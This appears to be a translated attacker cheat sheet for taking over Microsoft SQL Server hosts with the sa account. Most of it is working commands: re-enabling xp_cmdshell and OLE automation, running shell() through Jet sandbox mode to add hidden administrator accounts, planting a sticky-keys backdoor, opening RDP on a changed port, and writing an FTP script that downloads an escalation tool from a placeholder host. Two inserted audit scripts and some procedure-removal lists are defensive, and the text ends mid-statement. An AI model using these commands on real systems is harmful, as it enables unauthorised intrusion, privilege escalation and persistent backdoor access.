Running CMD commands when net and net1 are blocked
net user Administrator$ 920517 /add
net localgroup administrators Administrator$ /add
Step 1: dir net.exe /s /p  (or: dir net1.exe /s /p)
Step 2: C:\WINDOWS\system32\dllcache\net1.exe user 123 123 /add
Step 3: C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators 123 /add
◆◆◆◆◆◆◆◆◆◆◆◆◆◆
Sandbox-mode privilege escalation
When sethc.exe is blocked:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cacls c:\windows\system32\net.exe /e /t /g everyone:F")')
When net and net1 are both disabled:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("xcopy taskmgr.exe sethc.exe /y")')
If cmd is disabled:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("net user user pass /add")')
◆◆◆◆◆◆◆◆◆◆◆◆◆◆
Everything except xplog70.dll can be repaired with the commands below.
Step 1, drop first:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
(Error output like the following only means the objects were already gone:)
服務器: 消息 3701,級別 11,狀態 5,行 1
無法 除去 過程 'sp_addextendedproc',因爲它在系統目錄中不存在。
服務器: 消息 3701,級別 11,狀態 5,過程 sp_dropextendedproc,行 18
無法 除去 過程 'xp_cmdshell',因爲它在系統目錄中不存在。
Step 2, restore:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
This restores directly, whether or not sp_addextendedproc exists.
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
1. Fix for "Could not find stored procedure 'master..xp_cmdshell'":
EXEC sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
◆◆◆◆◆◆◆◆◆◆◆◆◆
Statement to restore sp_addextendedproc:
create procedure sp_addextendedproc --- 1996/08/30 20:13
    @functname nvarchar(517), /* (owner.)name of function to call */
    @dllname varchar(255)     /* name of DLL containing function */
as
    set implicit_transactions off
    if @@trancount > 0
    begin
        raiserror(15002,-1,-1,'sp_addextendedproc')
        return (1)
    end
    dbcc addextendedproc( @functname, @dllname)
    return (0) -- sp_addextendedproc
GO
◆◆◆◆◆◆◆◆◆◆◆◆◆
2. Error "無法裝載 DLL xpsql70.dll 或該DLL所引用的某一DLL。原因126(找不到指定模塊。)"
Fix: after connecting with the Query Analyzer, run
sp_dropextendedproc "xp_cmdshell"
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
Repairing XPLOG70.DLL (first use a file viewer to check the \x86\binn folder under the backup directory, then substitute that directory in the path below)
Step 1
exec sp_dropextendedproc 'xp_cmdshell'
Step 2
dbcc addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
Error 127
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
4. Direct account-add method
Removing odsole70.dll:
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
Restoring odsole70.dll:
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
Commands to add the account directly:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user sin sinhack /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators sin /add'
FTP download commands
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp賬號'
exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp密碼'
exec @ret = sp_oamethod @f, 'writeline', NULL,'get en.exe c:\en.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
(IP, ftp賬號 and ftp密碼 are placeholders for the FTP host, account and password; en.exe is the net-less privilege escalation script.)
3. net privilege escalation fails with "access denied", error 5 (important)
In this case there is no point trying net1; try copying a shift (sethc) backdoor instead. If the copy reports that 0 files were copied, it did not succeed. Then check whether you can upload: if so, upload the net-less privilege escalation tool that came out a while ago and add a user with it. In most of these cases uploading is not possible, though, so something else is needed. Since cmd can be executed, files can be downloaded with ftp from cmd, but ftp first needs a text or batch file to read from, and that file can be written with a SQL statement.
(Write the batch file with the same FTP download script shown above under "FTP download commands".)
After the Query Analyzer reports success, a 1.bat should appear on the C: drive (if the statement succeeded but the file is not there, write to a different folder: that server may forbid writing to the root of C:).
Then run from cmd: ftp -s:c:\1.bat
Once that completes, the net-less privilege escalation script has been downloaded to the C: drive. Alternatively, write a VBS privilege escalation script directly:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create("用戶")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "密碼",""'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3'
(用戶 and 密碼 are placeholders for the user name and password.)
Then run cscript c:\1.vbs from cmd.
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
Opening 3389 from cmd:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
1. Query the terminal port
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2. Enable Terminal Services on XP and 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3. Change the terminal port to 2008 (0x7d8); the default is 3389 (0xD3D)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4. Remove the XP/2003 firewall restriction on Terminal Services and the IP connection restriction
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
Opening 3389 with SQL statements
Open 3389:
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
Close 3389:
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
Check the 3389 port:
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Check the system version:
type c:\boot.ini
Plain CMD backdoor:
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
Sticky-keys (press Shift five times) backdoor commands:
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
5. Some commonly used SQL statements for recovery:
Restore most of the commonly used extended stored procedures with sp_addextendedproc (sp_addextendedproc itself must first be restored with the statement at the top):
use master
exec sp_addextendedproc xp_cmdshell,'xplog70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
Restore cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
1. SQL command to check whether the sticky-keys registry entry has been hijacked
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2. SQL command to hijack the sticky-keys function in the registry and replace it with Task Manager (any other command can of course be substituted)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3. SQL command to remove the sticky-keys hijack from the registry so that your server can no longer be abused by others
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
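A defender-side audit that reads the registry values touched by the commands on this page (the sethc.exe IFEO Debugger checked in item 1 above, plus the Jet SandBoxMode, fDenyTSConnections and RDP PortNumber values used elsewhere on the page) and flags tampering. This is an added example, not code from the original page; it assumes a sysadmin login on SQL Server 2000/2005 where xp_regread is registered.

```sql
-- Added audit script (not from the original page). Reads the registry values this
-- page's commands modify, via xp_regread with OUTPUT parameters, and reports a verdict.
-- Assumes sysadmin rights; a value that does not exist comes back as NULL.
SET NOCOUNT ON;
DECLARE @debugger nvarchar(260), @sandbox int, @denyTS int, @port int;

-- Sticky-keys hijack: any Debugger value under the sethc.exe IFEO key is abnormal.
EXEC master.dbo.xp_regread
    @rootkey    = 'HKEY_LOCAL_MACHINE',
    @key        = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
    @value_name = 'Debugger',
    @value      = @debugger OUTPUT;

-- Jet sandbox mode: 0 or 1 switches the sandbox off for non-Access callers such as
-- SQL Server, which is what lets shell() run inside OpenRowSet (this page sets both).
EXEC master.dbo.xp_regread
    @rootkey    = 'HKEY_LOCAL_MACHINE',
    @key        = 'SOFTWARE\Microsoft\Jet\4.0\Engines',
    @value_name = 'SandBoxMode',
    @value      = @sandbox OUTPUT;

-- Terminal Services: 0 = Remote Desktop connections allowed.
EXEC master.dbo.xp_regread
    @rootkey    = 'HKEY_LOCAL_MACHINE',
    @key        = 'SYSTEM\CurrentControlSet\Control\Terminal Server',
    @value_name = 'fDenyTSConnections',
    @value      = @denyTS OUTPUT;

-- RDP listener port; anything other than 3389 deserves a look.
EXEC master.dbo.xp_regread
    @rootkey    = 'HKEY_LOCAL_MACHINE',
    @key        = 'SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp',
    @value_name = 'PortNumber',
    @value      = @port OUTPUT;

-- One row per check so the result can be logged or compared against a baseline.
SELECT 'sethc.exe IFEO Debugger' AS check_name,
       ISNULL(@debugger, '<not set>') AS current_value,
       CASE WHEN @debugger IS NULL THEN 'ok'
            ELSE 'SUSPICIOUS: sticky-keys hijack present' END AS verdict
UNION ALL
SELECT 'Jet SandBoxMode', ISNULL(CONVERT(varchar(10), @sandbox), '<not set>'),
       CASE WHEN @sandbox IN (0, 1) THEN 'SUSPICIOUS: shell() usable from OpenRowSet'
            ELSE 'ok' END
UNION ALL
SELECT 'fDenyTSConnections', ISNULL(CONVERT(varchar(10), @denyTS), '<not set>'),
       CASE WHEN @denyTS = 0 THEN 'review: Remote Desktop enabled' ELSE 'ok' END
UNION ALL
SELECT 'RDP PortNumber', ISNULL(CONVERT(varchar(10), @port), '<not set>'),
       CASE WHEN @port <> 3389 THEN 'review: non-default RDP port' ELSE 'ok' END;
```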
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
SQL Server 阻止了對組件 'xp_cmdshell' 的 過程'sys.xp_cmdshell' 的訪問,因爲此組件已作爲此服務器安全配置的一部分而被關閉。系統管理員可以通過使用 sp_configure 啓用 'xp_cmdshell'。有關啓用 'xp_cmdshell' 的詳細信息,請參閱 SQL Server 聯機叢書中的 "外圍應用配置器"。
;EXEC sp_configure 'show advanced options', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'xp_cmdshell', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'show advanced options', 0 --
◆◆◆◆◆◆◆◆◆◆◆◆◆
Statement to run in the Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
On "xpsql.cpp: 錯誤 5 來自 CreateProcess(第 737 行)", add the account directly!
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user admin$ 920517 /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators admin$ /add")');
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
Restore xp_cmdshell:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
sp_addextendedproc 'xp_cmdshell','xplog70.dll'
Add stored procedures:
sp_addextendedproc 'sp_oacreate','odsole70.dll'
sp_addextendedproc 'xp_lake2', 'd:\wwwroot\caoo\wwwroot\xplake2.dll'
sp_dropextendedproc xp_lake2
Add an account:
EXEC xp_lake2 'net user > d:\wwwroot\caoo\wwwroot\1.txt'
EXEC xp_lake2 'net user admin$ admin /add'
EXEC xp_lake2 'net localgroup administrators admin$ /add'
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
3389 / SHIFT / SA sandbox-mode privilege escalation
----------------------
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
-------------------------------------------------------
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")');
-------------------------------------------------------
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
IV. Last resort:
If none of the methods above restores things, try adding the account directly with the following.
After connecting with the Query Analyzer:
On Windows 2000 Server:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 123 123 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 123 /add'
On XP or 2003 Server:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123 123 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 123 /add'
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin 1234 /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators admin /add")')
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user'
執行SQL語句時發生錯誤!
錯誤描述:SQL Server 阻止了對組件 'Ole Automation Procedures' 的 過程'sys.sp_OACreate' 的訪問,因爲此組件已作爲此服務器安全配置的一部分而被關閉。系統管理員可以通過使用 sp_configure 啓用 'Ole Automation Procedures'。有關啓用 'Ole Automation Procedures' 的詳細信息,請參閱 SQL Server 聯機叢書中的 "外圍應用配置器"。
exec master..sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
Success.
Running the SQL statement again:
[Microsoft][ODBC SQL Server Driver][SQL Server]在執行 xp_cmdshell 的過程中出錯。調用 'CreateProcess' 失敗,錯誤代碼: '5'。
Solution:
Restoring xp_cmdshell on SQL Server 2005
SQL Server 已封鎖元件 'xp_cmdshell' 的 程序 'sys.xp_cmdshell' 之存取,因為此元件已經由此伺服器的安全性組態關閉。系統管理員可以使用 sp_configure 來啟用 'xp_cmdshell' 的使用。如需有關啟用 'xp_cmdshell' 的詳細資訊,請參閱《SQL Server 線上叢書》中的<介面區組態>(Surface Area Configuration)。
The following single line solves it:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
Disabling works the same way; just change the trailing "1" to "0":
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;
I tried the method above and it did not work, which was frustrating. Out of boredom I ran the command below to look at the startup items in the registry, and when I checked again, xp_cmdshell had actually been restored successfully.
Exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
After obtaining the SA password, it often turns out that the server administrator or a "predecessor" has restricted net.exe and net1.exe, so no administrator account can be added. VBS has a WinNT object in its Active Directory (ADSI) part for managing local resources; with it an administrator can be added without relying on CMD or similar commands. The code is as follows:
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) 'get the ADSI interface and bind to it
Set oe=GetObject(os&"/Administrators,group") 'the Administrators group object
Set od=ob.Create("user","test") 'create the user
od.SetPassword "1234" 'set the password
od.SetInfo 'save
Set of=GetObject(os&"/test,user") 'get the user (the ",user" class qualifier belongs inside the path string)
oe.add os&"/test"
Save the code above as 1.vbs and run it with "cscript 1.vbs"; this adds a user named test with password 1234 to the system. The code to run in the Query Analyzer is as follows:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test,user") '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
After running the statements above, run the following line. It must be run on its own, not together with the statements above, otherwise you get "c:\1.vbs is being used by another program" and the user is not added:
exec master..xp_cmdshell 'cscript c:\1.vbs'
If the user was not added, the password 1234 may be too simple to satisfy the server's password complexity policy; try a more complex one and test again. You can also use echo to write the code into 1.vbs, in this form:
exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK") >>1.vbs'
However, for some reason none of the lines containing the "&" character can be written to 1.vbs this way; interested readers may want to work out a fix.
Using Jet sandbox mode avoids the trouble with xp_cmdshell and similar stored procedures and their DLLs. For security reasons sandbox mode is not enabled by default, so it has to be turned on with xp_regwrite:
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Then run the sandbox commands, which add a user named test with password 1234 to the system:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")')
The path differs between operating systems and must be adjusted accordingly:
NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
Also, on Microsoft SQL Server 2005 some stored procedures are disabled by default and must be enabled by command:
Enable xp_cmdshell:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
Enable OPENROWSET:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
Enable sp_oacreate:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

Error:
SQL Server 阻止了對組件 'Ad Hoc Distributed Queries' 的 STATEMENT'OpenRowset/OpenDatasource' 的訪問,因爲此組件已作爲此服務器安全配置的一部分而被關閉。系統管理員可以通過使用 sp_configure 啓用 'Ad Hoc Distributed Queries'。有關啓用 'Ad Hoc Distributed Queries' 的詳細信息,請參閱 SQL Server 聯機叢書中的 "外圍應用配置器"。
Analysis:
Ad Hoc Distributed Queries is an advanced option, so 'show advanced options' must be set to 1 first; only once the advanced options are exposed can it be configured. When disabling, the order is reversed: turn off Ad Hoc Distributed Queries first, then the advanced options.
Solution:
Open SQL Server 2005 and run the following stored procedure calls:
Enable Ad Hoc Distributed Queries:
exec sp_configure 'show advanced options',1
reconfigure
exec sp_configure 'Ad Hoc Distributed Queries',1
reconfigure
When finished, disable Ad Hoc Distributed Queries:
exec sp_configure 'Ad Hoc Distributed Queries',0
reconfigure
exec sp_configure 'show advanced options',0
reconfigure
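An added audit-and-hardening script (not code from the original page) that serves both this section and the sp_configure section on xp_cmdshell above: it reports the running state of the server options the page enables, checks whether xp_cmdshell is still registered, and disables everything in the order the analysis requires. It assumes sysadmin rights and SQL Server 2005 or later, where sys.configurations and sys.objects exist.

```sql
-- Added example (not from the original page). Audits the options this page turns on
-- and switches them off again, feature first and 'show advanced options' last.
SET NOCOUNT ON;

-- 1. Report the current state of the options an attacker would enable.
--    value = configured setting, value_in_use = what the running instance enforces;
--    a mismatch means a RECONFIGURE is still pending.
SELECT name,
       CONVERT(int, value)        AS configured,
       CONVERT(int, value_in_use) AS running,
       CASE WHEN CONVERT(int, value_in_use) = 1
            THEN 'ENABLED: confirm a business need or disable'
            ELSE 'ok' END           AS verdict
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'Ad Hoc Distributed Queries', 'show advanced options')
ORDER BY name;

-- 2. Is the xp_cmdshell extended procedure registered at all?
--    This is the page's own sysobjects check, written against the catalog view
--    (type 'X' = extended stored procedure).
SELECT COUNT(*) AS xp_cmdshell_registered
FROM master.sys.objects
WHERE type = 'X' AND name = 'xp_cmdshell';

-- 3. Disable. Hidden options cannot be set while 'show advanced options' is 0,
--    so it is raised first and lowered last, exactly as the analysis above says.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Re-run step 1 afterwards: every 'running' column should now read 0.
```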
Or enable it from the graphical interface (see figure).
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
Removing dangerous SQL stored procedures:
DROP PROCEDURE sp_makewebtask
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_process
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistring
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
exec master..sp_dropextendedproc sp_add_job
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwrite
exec master..sp_dropextendedproc xp_readwebtask
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistring
exec master..sp_dropextendedproc sp_OACreate
DROP PROCEDURE sp_addextendedproc
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
Statement to drop the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'
◆◆◆◆◆◆◆◆◆◆◆◆◆
Checking whether the extended stored procedure exists
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is present.
◆◆◆◆◆◆◆◆◆◆◆◆◆
Restore xp_cmdshell
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it worked.
◆◆◆◆◆◆◆◆◆◆◆◆◆
Otherwise upload xplog70.dll
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
◆◆◆◆◆◆◆◆◆◆◆◆◆
SQL statement to block cmdshell
sp_dropextendedproc "xp_cmdshell"
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
I. Changing the sa password:
After connecting with a SQL exploitation tool, run:
exec sp_password NULL,'新密碼','sa'
(新密碼 is the new password. Note: use with caution!)
◆◆◆◆◆◆◆◆◆◆◆◆◆
II. Simple patch for a weak sa password
Method 1: after connecting with the Query Analyzer, run:
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
